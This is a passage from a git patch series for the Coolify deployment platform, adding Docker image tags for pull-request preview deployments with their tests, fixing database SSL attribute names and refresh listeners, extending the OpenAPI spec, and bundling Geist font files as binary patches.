                                 <x-forms.button wire:click="generate_preview('{{ $preview->id }}')">Generate
@@ -157,7 +177,8 @@ class="flex items-end gap-2 pt-4">
                                 Force deploy (without
                                 cache)
                             </x-forms.button>
-                            <x-forms.button wire:click="deploy({{ data_get($preview, 'pull_request_id') }})">
+                            <x-forms.button
+                                wire:click="deploy({{ data_get($preview, 'pull_request_id') }}, null, false, '{{ data_get($preview, 'docker_registry_image_tag') }}')">
                                 @if (data_get($preview, 'status') === 'exited')
                                     <svg xmlns="http://www.w3.org/2000/svg" class="w-5 h-5 dark:text-warning"
                                         viewBox="0 0 24 24" stroke-width="1.5" stroke="currentColor" fill="none"
diff --git a/tests/Feature/DockerCleanupJobTest.php b/tests/Feature/DockerCleanupJobTest.php
index 446260e22..fa052f6c2 100644
--- a/tests/Feature/DockerCleanupJobTest.php
+++ b/tests/Feature/DockerCleanupJobTest.php
@@ -8,6 +8,22 @@
 
 uses(RefreshDatabase::class);
 
+it('persists the server id when creating an execution record', function () {
+    $user = User::factory()->create();
+    $team = $user->teams()->first();
+    $server = Server::factory()->create(['team_id' => $team->id]);
+
+    $execution = DockerCleanupExecution::create([
+        'server_id' => $server->id,
+    ]);
+
+    expect($execution->server_id)->toBe($server->id);
+    $this->assertDatabaseHas('docker_cleanup_executions', [
+        'id' => $execution->id,
+        'server_id' => $server->id,
+    ]);
+});
+
 it('creates a failed execution record when server is not functional', function () {
     $user = User::factory()->create();
     $team = $user->teams()->first();
diff --git a/tests/Feature/DockerImagePreviewDeploymentApiTest.php b/tests/Feature/DockerImagePreviewDeploymentApiTest.php
new file mode 100644
index 000000000..75af6d9a6
--- /dev/null
+++ b/tests/Feature/DockerImagePreviewDeploymentApiTest.php
@@ -0,0 +1,146 @@
+<?php
+
+use App\Models\Application;
+use App\Models\ApplicationPreview;
+use App\Models\Environment;
+use App\Models\Project;
+use App\Models\Server;
+use App\Models\StandaloneDocker;
+use App\Models\Team;
+use App\Models\User;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+use Illuminate\Support\Facades\Queue;
+use Illuminate\Support\Str;
+
+uses(RefreshDatabase::class);
+
+beforeEach(function () {
+    Queue::fake();
+
+    $this->team = Team::factory()->create();
+    $this->user = User::factory()->create();
+    $this->team->members()->attach($this->user->id, ['role' => 'owner']);
+
+    $plainTextToken = Str::random(40);
+    $token = $this->user->tokens()->create([
+        'name' => 'test-token',
+        'token' => hash('sha256', $plainTextToken),
+        'abilities' => ['*'],
+        'team_id' => $this->team->id,
+    ]);
+    $this->bearerToken = $token->getKey().'|'.$plainTextToken;
+
+    $this->server = Server::factory()->create(['team_id' => $this->team->id]);
+    $this->destination = StandaloneDocker::factory()->create([
+        'server_id' => $this->server->id,
+        'network' => 'coolify-'.Str::lower(Str::random(8)),
+    ]);
+    $this->project = Project::factory()->create(['team_id' => $this->team->id]);
+    $this->environment = Environment::factory()->create(['project_id' => $this->project->id]);
+});
+
+function createDockerImageApplication(Environment $environment, StandaloneDocker $destination): Application
+{
+    return Application::factory()->create([
+        'uuid' => (string) Str::uuid(),
+        'environment_id' => $environment->id,
+        'destination_id' => $destination->id,
+        'destination_type' => StandaloneDocker::class,
+        'build_pack' => 'dockerimage',
+        'docker_registry_image_name' => 'ghcr.io/coollabsio/example',
+        'docker_registry_image_tag' => 'latest',
+    ]);
+}
+
+test('it queues a docker image preview deployment and stores the preview tag', function () {
+    $application = createDockerImageApplication($this->environment, $this->destination);
+
+    $response = $this->withHeaders([
+        'Authorization' => 'Bearer '.$this->bearerToken,
+    ])->postJson('/api/v1/deploy', [
+        'uuid' => $application->uuid,
+        'pull_request_id' => 1234,
+        'docker_tag' => 'pr_1234',
+    ]);
+
+    $response->assertSuccessful();
+    $response->assertJsonPath('deployments.0.resource_uuid', $application->uuid);
+
+    $preview = ApplicationPreview::query()
+        ->where('application_id', $application->id)
+        ->where('pull_request_id', 1234)
+        ->first();
+
+    expect($preview)->not()->toBeNull();
+    expect($preview->docker_registry_image_tag)->toBe('pr_1234');
+
+    $deployment = $application->deployment_queue()->latest('id')->first();
+
+    expect($deployment)->not()->toBeNull();
+    expect($deployment->pull_request_id)->toBe(1234);
+    expect($deployment->docker_registry_image_tag)->toBe('pr_1234');
+});
+
+test('it updates an existing docker image preview tag when redeploying through the api', function () {
+    $application = createDockerImageApplication($this->environment, $this->destination);
+
+    ApplicationPreview::create([
+        'application_id' => $application->id,
+        'pull_request_id' => 99,
+        'pull_request_html_url' => '',
+        'docker_registry_image_tag' => 'pr_99_old',
+    ]);
+
+    $response = $this->withHeaders([
+        'Authorization' => 'Bearer '.$this->bearerToken,
+    ])->postJson('/api/v1/deploy', [
+        'uuid' => $application->uuid,
+        'pull_request_id' => 99,
+        'docker_tag' => 'pr_99_new',
+        'force' => true,
+    ]);
+
+    $response->assertSuccessful();
+
+    $preview = ApplicationPreview::query()
+        ->where('application_id', $application->id)
+        ->where('pull_request_id', 99)
+        ->first();
+
+    expect($preview->docker_registry_image_tag)->toBe('pr_99_new');
+});
+
+test('it rejects docker_tag without pull_request_id', function () {
+    $application = createDockerImageApplication($this->environment, $this->destination);
+
+    $response = $this->withHeaders([
+        'Authorization' => 'Bearer '.$this->bearerToken,
+    ])->postJson('/api/v1/deploy', [
+        'uuid' => $application->uuid,
+        'docker_tag' => 'pr_1234',
+    ]);
+
+    $response->assertStatus(400);
+    $response->assertJson(['message' => 'docker_tag requires pull_request_id.']);
+});
+
+test('it rejects docker_tag for non docker image applications', function () {
+    $application = Application::factory()->create([
+        'uuid' => (string) Str::uuid(),
+        'environment_id' => $this->environment->id,
+        'destination_id' => $this->destination->id,
+        'destination_type' => StandaloneDocker::class,
+        'build_pack' => 'nixpacks',
+    ]);
+
+    $response = $this->withHeaders([
+        'Authorization' => 'Bearer '.$this->bearerToken,
+    ])->postJson('/api/v1/deploy', [
+        'uuid' => $application->uuid,
+        'pull_request_id' => 7,
+        'docker_tag' => 'pr_7',
+    ]);
+
+    $response->assertSuccessful();
+    $response->assertJsonPath('deployments.0.message', 'docker_tag can only be used with Docker Image applications.');
+});
diff --git a/tests/Unit/DockerImagePreviewTagResolutionTest.php b/tests/Unit/DockerImagePreviewTagResolutionTest.php
new file mode 100644
index 000000000..e6d0b6a4e
--- /dev/null
+++ b/tests/Unit/DockerImagePreviewTagResolutionTest.php
@@ -0,0 +1,76 @@
+<?php
+
+use App\Jobs\ApplicationDeploymentJob;
+use App\Models\Application;
+
+it('prefers the preview specific docker image tag for preview deployments', function () {
+    $reflection = new ReflectionClass(ApplicationDeploymentJob::class);
+    $job = $reflection->newInstanceWithoutConstructor();
+
+    $pullRequestProperty = $reflection->getProperty('pull_request_id');
+    $pullRequestProperty->setAccessible(true);
+    $pullRequestProperty->setValue($job, 42);
+
+    $applicationProperty = $reflection->getProperty('application');
+    $applicationProperty->setAccessible(true);
+    $applicationProperty->setValue($job, new Application([
+        'docker_registry_image_tag' => 'latest',
+    ]));
+
+    $previewTagProperty = $reflection->getProperty('dockerImagePreviewTag');
+    $previewTagProperty->setAccessible(true);
+    $previewTagProperty->setValue($job, 'pr_42');
+
+    $method = $reflection->getMethod('resolveDockerImageTag');
+    $method->setAccessible(true);
+
+    expect($method->invoke($job))->toBe('pr_42');
+});
+
+it('falls back to the application docker image tag for non preview deployments', function () {
+    $reflection = new ReflectionClass(ApplicationDeploymentJob::class);
+    $job = $reflection->newInstanceWithoutConstructor();
+
+    $pullRequestProperty = $reflection->getProperty('pull_request_id');
+    $pullRequestProperty->setAccessible(true);
+    $pullRequestProperty->setValue($job, 0);
+
+    $applicationProperty = $reflection->getProperty('application');
+    $applicationProperty->setAccessible(true);
+    $applicationProperty->setValue($job, new Application([
+        'docker_registry_image_tag' => 'stable',
+    ]));
+
+    $previewTagProperty = $reflection->getProperty('dockerImagePreviewTag');
+    $previewTagProperty->setAccessible(true);
+    $previewTagProperty->setValue($job, 'pr_42');
+
+    $method = $reflection->getMethod('resolveDockerImageTag');
+    $method->setAccessible(true);
+
+    expect($method->invoke($job))->toBe('stable');
+});
+
+it('falls back to latest when neither preview nor application tags are set', function () {
+    $reflection = new ReflectionClass(ApplicationDeploymentJob::class);
+    $job = $reflection->newInstanceWithoutConstructor();
+
+    $pullRequestProperty = $reflection->getProperty('pull_request_id');
+    $pullRequestProperty->setAccessible(true);
+    $pullRequestProperty->setValue($job, 7);
+
+    $applicationProperty = $reflection->getProperty('application');
+    $applicationProperty->setAccessible(true);
+    $applicationProperty->setValue($job, new Application([
+        'docker_registry_image_tag' => '',
+    ]));
+
+    $previewTagProperty = $reflection->getProperty('dockerImagePreviewTag');
+    $previewTagProperty->setAccessible(true);
+    $previewTagProperty->setValue($job, null);
+
+    $method = $reflection->getMethod('resolveDockerImageTag');
+    $method->setAccessible(true);
+
+    expect($method->invoke($job))->toBe('latest');
+});

From 1497ad35a9497795d95cff1547dc4852b2b9941f Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 30 Mar 2026 17:29:28 +0200
Subject: [PATCH 203/213] fix(models): use snake_case for Eloquent attribute
 access

Update property access in database components and Application model to
use snake_case conventions (common_name, subject_alternative_names)
for Eloquent attributes. Also add null-safe operators (?->) for
settings access in Application model to handle null values safely.
---
 app/Livewire/Project/Database/Dragonfly/General.php | 4 ++--
 app/Livewire/Project/Database/Keydb/General.php     | 4 ++--
 app/Livewire/Project/Database/Redis/General.php     | 4 ++--
 app/Models/Application.php                          | 2 +-
 4 files changed, 7 insertions(+), 7 deletions(-)

diff --git a/app/Livewire/Project/Database/Dragonfly/General.php b/app/Livewire/Project/Database/Dragonfly/General.php
index 0a1635fce..2e6c9dca7 100644
--- a/app/Livewire/Project/Database/Dragonfly/General.php
+++ b/app/Livewire/Project/Database/Dragonfly/General.php
@@ -278,8 +278,8 @@ public function regenerateSslCertificate()
             }
 
             SslHelper::generateSslCertificate(
-                commonName: $existingCert->commonName,
-                subjectAlternativeNames: $existingCert->subjectAlternativeNames ?? [],
+                commonName: $existingCert->common_name,
+                subjectAlternativeNames: $existingCert->subject_alternative_names ?? [],
                 resourceType: $existingCert->resource_type,
                 resourceId: $existingCert->resource_id,
                 serverId: $existingCert->server_id,
diff --git a/app/Livewire/Project/Database/Keydb/General.php b/app/Livewire/Project/Database/Keydb/General.php
index b6cc98176..235e34e20 100644
--- a/app/Livewire/Project/Database/Keydb/General.php
+++ b/app/Livewire/Project/Database/Keydb/General.php
@@ -283,8 +283,8 @@ public function regenerateSslCertificate()
             }
 
             SslHelper::generateSslCertificate(
-                commonName: $existingCert->commonName,
-                subjectAlternativeNames: $existingCert->subjectAlternativeNames ?? [],
+                commonName: $existingCert->common_name,
+                subjectAlternativeNames: $existingCert->subject_alternative_names ?? [],
                 resourceType: $existingCert->resource_type,
                 resourceId: $existingCert->resource_id,
                 serverId: $existingCert->server_id,
diff --git a/app/Livewire/Project/Database/Redis/General.php b/app/Livewire/Project/Database/Redis/General.php
index 80a0b904c..e131bc598 100644
--- a/app/Livewire/Project/Database/Redis/General.php
+++ b/app/Livewire/Project/Database/Redis/General.php
@@ -296,8 +296,8 @@ public function regenerateSslCertificate()
             }
 
             SslHelper::generateSslCertificate(
-                commonName: $existingCert->commonName,
-                subjectAlternativeNames: $existingCert->subjectAlternativeNames ?? [],
+                commonName: $existingCert->common_name,
+                subjectAlternativeNames: $existingCert->subject_alternative_names ?? [],
                 resourceType: $existingCert->resource_type,
                 resourceId: $existingCert->resource_id,
                 serverId: $existingCert->server_id,
diff --git a/app/Models/Application.php b/app/Models/Application.php
index 018bfd421..bdc76eb33 100644
--- a/app/Models/Application.php
+++ b/app/Models/Application.php
@@ -1136,7 +1136,7 @@ public function isLogDrainEnabled()
 
     public function isConfigurationChanged(bool $save = false)
     {
-        $newConfigHash = base64_encode($this->fqdn.$this->git_repository.$this->git_branch.$this->git_commit_sha.$this->build_pack.$this->static_image.$this->install_command.$this->build_command.$this->start_command.$this->ports_exposes.$this->ports_mappings.$this->custom_network_aliases.$this->base_directory.$this->publish_directory.$this->dockerfile.$this->dockerfile_location.$this->custom_labels.$this->custom_docker_run_options.$this->dockerfile_target_build.$this->redirect.$this->custom_nginx_configuration.$this->settings->use_build_secrets.$this->settings->inject_build_args_to_dockerfile.$this->settings->include_source_commit_in_build);
+        $newConfigHash = base64_encode($this->fqdn.$this->git_repository.$this->git_branch.$this->git_commit_sha.$this->build_pack.$this->static_image.$this->install_command.$this->build_command.$this->start_command.$this->ports_exposes.$this->ports_mappings.$this->custom_network_aliases.$this->base_directory.$this->publish_directory.$this->dockerfile.$this->dockerfile_location.$this->custom_labels.$this->custom_docker_run_options.$this->dockerfile_target_build.$this->redirect.$this->custom_nginx_configuration.$this->settings?->use_build_secrets.$this->settings?->inject_build_args_to_dockerfile.$this->settings?->include_source_commit_in_build);
         if ($this->pull_request_id === 0 || $this->pull_request_id === null) {
             $newConfigHash .= json_encode($this->environment_variables()->get(['value',  'is_multiline', 'is_literal', 'is_buildtime', 'is_runtime'])->sort());
         } else {

From 2692496726f59ae4535aa7c29abf4c9c2d91f5f2 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Tue, 31 Mar 2026 09:29:36 +0200
Subject: [PATCH 204/213] fix(database): refresh SSL/status state and harden
 clone writes

Handle database status updates more reliably by listening for `ServiceChecked`
and using explicit `refresh()` handlers in Livewire database components.

Also switch guarded clone/create paths to `forceFill`/`forceCreate` in helper
flows to avoid missing persisted attributes during app/service cloning.

Update log/terminal font stacks to Geist (with bundled variable fonts) and add
coverage for SSL status refresh, persistent volume UUID cloning, and log font
styling.
---
 .../Project/Database/Dragonfly/General.php    |   9 +-
 .../Project/Database/Keydb/General.php        |   9 +-
 .../Project/Database/Mariadb/General.php      |   4 +-
 .../Project/Database/Mongodb/General.php      |   4 +-
 .../Project/Database/Mysql/General.php        |   4 +-
 .../Project/Database/Postgresql/General.php   |  10 ++-
 .../Project/Database/Redis/General.php        |   4 +-
 bootstrap/helpers/applications.php            |  15 ++--
 bootstrap/helpers/shared.php                  |   8 +-
 openapi.json                                  |  30 +++++++
 openapi.yaml                                  |  23 +++++
 resources/css/app.css                         |   6 +-
 resources/css/fonts.css                       |  15 ++++
 resources/fonts/geist-mono-variable.woff2     | Bin 0 -> 71136 bytes
 resources/fonts/geist-sans-variable.woff2     | Bin 0 -> 69684 bytes
 resources/js/terminal.js                      |   2 +-
 .../views/livewire/activity-monitor.blade.php |   2 +-
 .../application/deployment/show.blade.php     |   4 +-
 .../project/shared/get-logs.blade.php         |   4 +-
 .../docker-cleanup-executions.blade.php       |   4 +-
 .../Feature/ClonePersistentVolumeUuidTest.php |  84 +++++++++++++++++-
 .../Feature/DatabaseSslStatusRefreshTest.php  |  77 ++++++++++++++++
 tests/Feature/LogFontStylingTest.php          |  45 ++++++++++
 tests/Unit/ServiceParserImageUpdateTest.php   |   3 +-
 24 files changed, 333 insertions(+), 33 deletions(-)
 create mode 100644 resources/fonts/geist-mono-variable.woff2
 create mode 100644 resources/fonts/geist-sans-variable.woff2
 create mode 100644 tests/Feature/DatabaseSslStatusRefreshTest.php
 create mode 100644 tests/Feature/LogFontStylingTest.php

diff --git a/app/Livewire/Project/Database/Dragonfly/General.php b/app/Livewire/Project/Database/Dragonfly/General.php
index 591780cfb..5176f5ff9 100644
--- a/app/Livewire/Project/Database/Dragonfly/General.php
+++ b/app/Livewire/Project/Database/Dragonfly/General.php
@@ -57,7 +57,8 @@ public function getListeners()
 
         return [
             "echo-private:team.{$teamId},DatabaseProxyStopped" => 'databaseProxyStopped',
-            "echo-private:user.{$userId},DatabaseStatusChanged" => '$refresh',
+            "echo-private:user.{$userId},DatabaseStatusChanged" => 'refresh',
+            "echo-private:team.{$teamId},ServiceChecked" => 'refresh',
         ];
     }
 
@@ -299,4 +300,10 @@ public function regenerateSslCertificate()
             handleError($e, $this);
         }
     }
+
+    public function refresh(): void
+    {
+        $this->database->refresh();
+        $this->syncData();
+    }
 }
diff --git a/app/Livewire/Project/Database/Keydb/General.php b/app/Livewire/Project/Database/Keydb/General.php
index 35799e55f..b50f196a8 100644
--- a/app/Livewire/Project/Database/Keydb/General.php
+++ b/app/Livewire/Project/Database/Keydb/General.php
@@ -59,7 +59,8 @@ public function getListeners()
 
         return [
             "echo-private:team.{$teamId},DatabaseProxyStopped" => 'databaseProxyStopped',
-            "echo-private:user.{$userId},DatabaseStatusChanged" => '$refresh',
+            "echo-private:user.{$userId},DatabaseStatusChanged" => 'refresh',
+            "echo-private:team.{$teamId},ServiceChecked" => 'refresh',
         ];
     }
 
@@ -304,4 +305,10 @@ public function regenerateSslCertificate()
             handleError($e, $this);
         }
     }
+
+    public function refresh(): void
+    {
+        $this->database->refresh();
+        $this->syncData();
+    }
 }
diff --git a/app/Livewire/Project/Database/Mariadb/General.php b/app/Livewire/Project/Database/Mariadb/General.php
index 5615765fd..9a1a8bd68 100644
--- a/app/Livewire/Project/Database/Mariadb/General.php
+++ b/app/Livewire/Project/Database/Mariadb/General.php
@@ -61,9 +61,11 @@ class General extends Component
     public function getListeners()
     {
         $userId = Auth::id();
+        $teamId = Auth::user()->currentTeam()->id;
 
         return [
-            "echo-private:user.{$userId},DatabaseStatusChanged" => '$refresh',
+            "echo-private:user.{$userId},DatabaseStatusChanged" => 'refresh',
+            "echo-private:team.{$teamId},ServiceChecked" => 'refresh',
         ];
     }
 
diff --git a/app/Livewire/Project/Database/Mongodb/General.php b/app/Livewire/Project/Database/Mongodb/General.php
index 0bc6d1e2f..a21de744a 100644
--- a/app/Livewire/Project/Database/Mongodb/General.php
+++ b/app/Livewire/Project/Database/Mongodb/General.php
@@ -61,9 +61,11 @@ class General extends Component
     public function getListeners()
     {
         $userId = Auth::id();
+        $teamId = Auth::user()->currentTeam()->id;
 
         return [
-            "echo-private:user.{$userId},DatabaseStatusChanged" => '$refresh',
+            "echo-private:user.{$userId},DatabaseStatusChanged" => 'refresh',
+            "echo-private:team.{$teamId},ServiceChecked" => 'refresh',
         ];
     }
 
diff --git a/app/Livewire/Project/Database/Mysql/General.php b/app/Livewire/Project/Database/Mysql/General.php
index df244662e..cacb4ac49 100644
--- a/app/Livewire/Project/Database/Mysql/General.php
+++ b/app/Livewire/Project/Database/Mysql/General.php
@@ -63,9 +63,11 @@ class General extends Component
     public function getListeners()
     {
         $userId = Auth::id();
+        $teamId = Auth::user()->currentTeam()->id;
 
         return [
-            "echo-private:user.{$userId},DatabaseStatusChanged" => '$refresh',
+            "echo-private:user.{$userId},DatabaseStatusChanged" => 'refresh',
+            "echo-private:team.{$teamId},ServiceChecked" => 'refresh',
         ];
     }
 
diff --git a/app/Livewire/Project/Database/Postgresql/General.php b/app/Livewire/Project/Database/Postgresql/General.php
index f862e0cc6..22e350683 100644
--- a/app/Livewire/Project/Database/Postgresql/General.php
+++ b/app/Livewire/Project/Database/Postgresql/General.php
@@ -71,9 +71,11 @@ class General extends Component
     public function getListeners()
     {
         $userId = Auth::id();
+        $teamId = Auth::user()->currentTeam()->id;
 
         return [
-            "echo-private:user.{$userId},DatabaseStatusChanged" => '$refresh',
+            "echo-private:user.{$userId},DatabaseStatusChanged" => 'refresh',
+            "echo-private:team.{$teamId},ServiceChecked" => 'refresh',
             'save_init_script',
             'delete_init_script',
         ];
@@ -488,4 +490,10 @@ public function submit()
             }
         }
     }
+
+    public function refresh(): void
+    {
+        $this->database->refresh();
+        $this->syncData();
+    }
 }
diff --git a/app/Livewire/Project/Database/Redis/General.php b/app/Livewire/Project/Database/Redis/General.php
index 2eec14c01..3c32a6192 100644
--- a/app/Livewire/Project/Database/Redis/General.php
+++ b/app/Livewire/Project/Database/Redis/General.php
@@ -59,9 +59,11 @@ class General extends Component
     public function getListeners()
     {
         $userId = Auth::id();
+        $teamId = Auth::user()->currentTeam()->id;
 
         return [
-            "echo-private:user.{$userId},DatabaseStatusChanged" => '$refresh',
+            "echo-private:user.{$userId},DatabaseStatusChanged" => 'refresh',
+            "echo-private:team.{$teamId},ServiceChecked" => 'refresh',
             'envsUpdated' => 'refresh',
         ];
     }
diff --git a/bootstrap/helpers/applications.php b/bootstrap/helpers/applications.php
index ceae64d84..e4feec692 100644
--- a/bootstrap/helpers/applications.php
+++ b/bootstrap/helpers/applications.php
@@ -237,10 +237,11 @@ function clone_application(Application $source, $destination, array $overrides =
             'id',
             'created_at',
             'updated_at',
-        ])->fill([
+        ])->forceFill([
             'application_id' => $newApplication->id,
         ]);
         $newApplicationSettings->save();
+        $newApplication->setRelation('settings', $newApplicationSettings->fresh());
     }
 
     // Clone tags
@@ -256,7 +257,7 @@ function clone_application(Application $source, $destination, array $overrides =
             'id',
             'created_at',
             'updated_at',
-        ])->fill([
+        ])->forceFill([
             'uuid' => (string) new Cuid2,
             'application_id' => $newApplication->id,
             'team_id' => currentTeam()->id,
@@ -271,7 +272,7 @@ function clone_application(Application $source, $destination, array $overrides =
             'id',
             'created_at',
             'updated_at',
-        ])->fill([
+        ])->forceFill([
             'uuid' => (string) new Cuid2,
             'application_id' => $newApplication->id,
             'status' => 'exited',
@@ -303,7 +304,7 @@ function clone_application(Application $source, $destination, array $overrides =
             'created_at',
             'updated_at',
             'uuid',
-        ])->fill([
+        ])->forceFill([
             'name' => $newName,
             'resource_id' => $newApplication->id,
         ]);
@@ -339,7 +340,7 @@ function clone_application(Application $source, $destination, array $overrides =
             'id',
             'created_at',
             'updated_at',
-        ])->fill([
+        ])->forceFill([
             'resource_id' => $newApplication->id,
         ]);
         $newStorage->save();
@@ -353,7 +354,7 @@ function clone_application(Application $source, $destination, array $overrides =
                 'id',
                 'created_at',
                 'updated_at',
-            ])->fill([
+            ])->forceFill([
                 'resourceable_id' => $newApplication->id,
                 'resourceable_type' => $newApplication->getMorphClass(),
                 'is_preview' => false,
@@ -370,7 +371,7 @@ function clone_application(Application $source, $destination, array $overrides =
                 'id',
                 'created_at',
                 'updated_at',
-            ])->fill([
+            ])->forceFill([
                 'resourceable_id' => $newApplication->id,
                 'resourceable_type' => $newApplication->getMorphClass(),
                 'is_preview' => true,
diff --git a/bootstrap/helpers/shared.php b/bootstrap/helpers/shared.php
index cd773f6a9..a43f2e340 100644
--- a/bootstrap/helpers/shared.php
+++ b/bootstrap/helpers/shared.php
@@ -1919,7 +1919,7 @@ function parseDockerComposeFile(Service|Application $resource, bool $isNew = fal
                     // Create new serviceApplication or serviceDatabase
                     if ($isDatabase) {
                         if ($isNew) {
-                            $savedService = ServiceDatabase::create([
+                            $savedService = ServiceDatabase::forceCreate([
                                 'name' => $serviceName,
                                 'image' => $image,
                                 'service_id' => $resource->id,
@@ -1930,7 +1930,7 @@ function parseDockerComposeFile(Service|Application $resource, bool $isNew = fal
                                 'service_id' => $resource->id,
                             ])->first();
                             if (is_null($savedService)) {
-                                $savedService = ServiceDatabase::create([
+                                $savedService = ServiceDatabase::forceCreate([
                                     'name' => $serviceName,
                                     'image' => $image,
                                     'service_id' => $resource->id,
@@ -1939,7 +1939,7 @@ function parseDockerComposeFile(Service|Application $resource, bool $isNew = fal
                         }
                     } else {
                         if ($isNew) {
-                            $savedService = ServiceApplication::create([
+                            $savedService = ServiceApplication::forceCreate([
                                 'name' => $serviceName,
                                 'image' => $image,
                                 'service_id' => $resource->id,
@@ -1950,7 +1950,7 @@ function parseDockerComposeFile(Service|Application $resource, bool $isNew = fal
                                 'service_id' => $resource->id,
                             ])->first();
                             if (is_null($savedService)) {
-                                $savedService = ServiceApplication::create([
+                                $savedService = ServiceApplication::forceCreate([
                                     'name' => $serviceName,
                                     'image' => $image,
                                     'service_id' => $resource->id,
diff --git a/openapi.json b/openapi.json
index ed8decb48..239068300 100644
--- a/openapi.json
+++ b/openapi.json
@@ -4331,6 +4331,11 @@
                                     "database_backup_retention_max_storage_s3": {
                                         "type": "integer",
                                         "description": "Max storage (MB) for S3 backups"
+                                    },
+                                    "timeout": {
+                                        "type": "integer",
+                                        "description": "Backup job timeout in seconds (min: 60, max: 36000)",
+                                        "default": 3600
                                     }
                                 },
                                 "type": "object"
@@ -4896,6 +4901,11 @@
                                     "database_backup_retention_max_storage_s3": {
                                         "type": "integer",
                                         "description": "Max storage of the backup in S3"
+                                    },
+                                    "timeout": {
+                                        "type": "integer",
+                                        "description": "Backup job timeout in seconds (min: 60, max: 36000)",
+                                        "default": 3600
                                     }
                                 },
                                 "type": "object"
@@ -10451,6 +10461,26 @@
                                             "none"
                                         ],
                                         "description": "The proxy type."
+                                    },
+                                    "concurrent_builds": {
+                                        "type": "integer",
+                                        "description": "Number of concurrent builds."
+                                    },
+                                    "dynamic_timeout": {
+                                        "type": "integer",
+                                        "description": "Deployment timeout in seconds."
+                                    },
+                                    "deployment_queue_limit": {
+                                        "type": "integer",
+                                        "description": "Maximum number of queued deployments."
+                                    },
+                                    "server_disk_usage_notification_threshold": {
+                                        "type": "integer",
+                                        "description": "Server disk usage notification threshold (%)."
+                                    },
+                                    "server_disk_usage_check_frequency": {
+                                        "type": "string",
+                                        "description": "Cron expression for disk usage check frequency."
                                     }
                                 },
                                 "type": "object"
diff --git a/openapi.yaml b/openapi.yaml
index 157cd9f69..5bf6059af 100644
--- a/openapi.yaml
+++ b/openapi.yaml
@@ -2734,6 +2734,10 @@ paths:
                 database_backup_retention_max_storage_s3:
                   type: integer
                   description: 'Max storage (MB) for S3 backups'
+                timeout:
+                  type: integer
+                  description: 'Backup job timeout in seconds (min: 60, max: 36000)'
+                  default: 3600
               type: object
       responses:
         '201':
@@ -3125,6 +3129,10 @@ paths:
                 database_backup_retention_max_storage_s3:
                   type: integer
                   description: 'Max storage of the backup in S3'
+                timeout:
+                  type: integer
+                  description: 'Backup job timeout in seconds (min: 60, max: 36000)'
+                  default: 3600
               type: object
       responses:
         '200':
@@ -6669,6 +6677,21 @@ paths:
                   type: string
                   enum: [traefik, caddy, none]
                   description: 'The proxy type.'
+                concurrent_builds:
+                  type: integer
+                  description: 'Number of concurrent builds.'
+                dynamic_timeout:
+                  type: integer
+                  description: 'Deployment timeout in seconds.'
+                deployment_queue_limit:
+                  type: integer
+                  description: 'Maximum number of queued deployments.'
+                server_disk_usage_notification_threshold:
+                  type: integer
+                  description: 'Server disk usage notification threshold (%).'
+                server_disk_usage_check_frequency:
+                  type: string
+                  description: 'Cron expression for disk usage check frequency.'
               type: object
       responses:
         '201':
diff --git a/resources/css/app.css b/resources/css/app.css
index 3cfa03dae..2c30baf64 100644
--- a/resources/css/app.css
+++ b/resources/css/app.css
@@ -14,7 +14,9 @@
 @custom-variant dark (&:where(.dark, .dark *));
 
 @theme {
-    --font-sans: Inter, sans-serif;
+    --font-sans: 'Geist Sans', Inter, sans-serif;
+    --font-geist-sans: 'Geist Sans', Inter, sans-serif;
+    --font-logs: 'Geist Mono', 'SFMono-Regular', Consolas, 'Liberation Mono', Menlo, monospace;
 
     --color-base: #101010;
     --color-warning: #fcd452;
@@ -96,7 +98,7 @@ body {
 }
 
 body {
-    @apply min-h-screen text-sm antialiased scrollbar overflow-x-hidden;
+    @apply min-h-screen text-sm font-sans antialiased scrollbar overflow-x-hidden;
 }
 
 .coolify-monaco-editor {
diff --git a/resources/css/fonts.css b/resources/css/fonts.css
index c8c4448eb..e5c6a694d 100644
--- a/resources/css/fonts.css
+++ b/resources/css/fonts.css
@@ -70,3 +70,18 @@ @font-face {
   src: url('../fonts/inter-v13-cyrillic_cyrillic-ext_greek_greek-ext_latin_latin-ext_vietnamese-regular.woff2') format('woff2');
 }
 
+@font-face {
+  font-display: swap;
+  font-family: 'Geist Mono';
+  font-style: normal;
+  font-weight: 100 900;
+  src: url('../fonts/geist-mono-variable.woff2') format('woff2');
+}
+
+@font-face {
+  font-display: swap;
+  font-family: 'Geist Sans';
+  font-style: normal;
+  font-weight: 100 900;
+  src: url('../fonts/geist-sans-variable.woff2') format('woff2');
+}
diff --git a/resources/fonts/geist-mono-variable.woff2 b/resources/fonts/geist-mono-variable.woff2
new file mode 100644
index 0000000000000000000000000000000000000000..c8a7d84012d3381af28701148c8a42209378e2d9
GIT binary patch
literal 71136
zcmV)6K*+y$Pew8T0RR910Tti?6#xJL0-ziK0TpBb0kbmz00000000000000000000
z0000QhFTlQOdQ_?KS)+VQYt@9RzXrc24Fu^R6$f60FzWNeh~-?gVPLx>?SaTfeZmQ
z0we>YYzvYM00baEZDn*}F9ncD2i!&s2U|g6k`9$|IJ=H}{39d+ZCaaSw5?R21BsLV
z)s94VgnJ^)Q?+$?>Ay-g*m!E#HjU}monjGH)A#?~5dHuE|NsC0|Lc-T%y|iL`2{jm
zmg1<^)owuwbKdzNLQJu&%5qhw)Szyo4`f?+PWT$@^?DPdw{05{0?K|!V#K7RS?m(_
zh?zGTnA^5l%$kE@FaxDg)C<fTx+on*(l>&jc7&I^gE$$^6br>0wKBt`PB<zlWV(p8
z$*Wl8ynT1pAY}-J85F;Vjp_}QcP#Fz@JiFnOiO0^p!JpJSg99pqCUG79}15&ZEdD)
z%=BhkJzb{$()zFyp@`d24sp^p877^D+OP7l;=J7u{Vd+~m(Kh@KDG61=c>A3`HC^d
zW`h`GJb2N(f@Wr#nW?1mEyg^UOOMruedO~}Kc{WL;P;4n%#V3A+fsYEGE=u#N%fKA
zO1&RZiTRNw<WD`RFFr;PBV6H{UTqiM7tLoe95iCo4px-9&*6upN{U6A{2EBh=kTK5
zQ=_2xAq)fugHe3_8XV<{FcALFfBWzjWGfH9xZx=N1hqSyDKpHJJIs_)vK7p->#!jx
zDjGQAhNlyI2jd*Z<i$DOc>M`jJQ{}st5u9%@UMxET?hJ=dk#(ndXSQY)zZmcclw6H
zNk`|8t_(>37vc{T9krH947554gTufHPINBl9!@!_XWeBTi_oiHbNJF&z_CJq>hOVf
